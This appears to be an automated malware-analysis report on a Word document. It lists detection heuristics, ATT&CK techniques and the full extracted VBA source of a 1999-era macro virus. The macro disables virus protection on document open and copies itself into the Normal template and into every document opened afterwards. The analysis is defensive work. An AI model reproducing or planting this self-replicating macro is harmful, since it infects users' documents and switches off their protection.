MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro explicitly sets 'Options.VirusProtection = False', indicating an attempt to bypass security measures. The presence of the 'Heuristics.Macro.DisableVirusProtection-6136181-1' ClamAV detection further supports this malicious intent. The macro's logic suggests it aims to replace the current document's macros with those from the Normal template, potentially to execute further malicious code.
Heuristics 3
-
ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1168 bytes |
SHA-256: c8124c3d2651203d39328b5cd1ed3f748af36070f5d459191ff59c7e7ec370d1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Please do NOT modify this file ! Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False Set Active = ActiveDocument.VBProject.VBComponents(1).CodeModule Set Normal = NormalTemplate.VBProject.VBComponents(1).CodeModule Dim mark As String mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1) If mark = "'Please do NOT modify this file !" Then Active.DeleteLines 1, Active.CountOfLines Active.InsertLines 1, Normal.Lines(1, Normal.CountOfLines) Else NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Normal.CountOfLines Normal.InsertLines 1, "'Please do NOT modify this file !" Normal.InsertLines 2, Active.Lines(2, Active.CountOfLines) NormalTemplate.Save ActiveDocument.Save ThisDocument.Save ' [MOT] (C) Dr.Copy 1999 End If End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.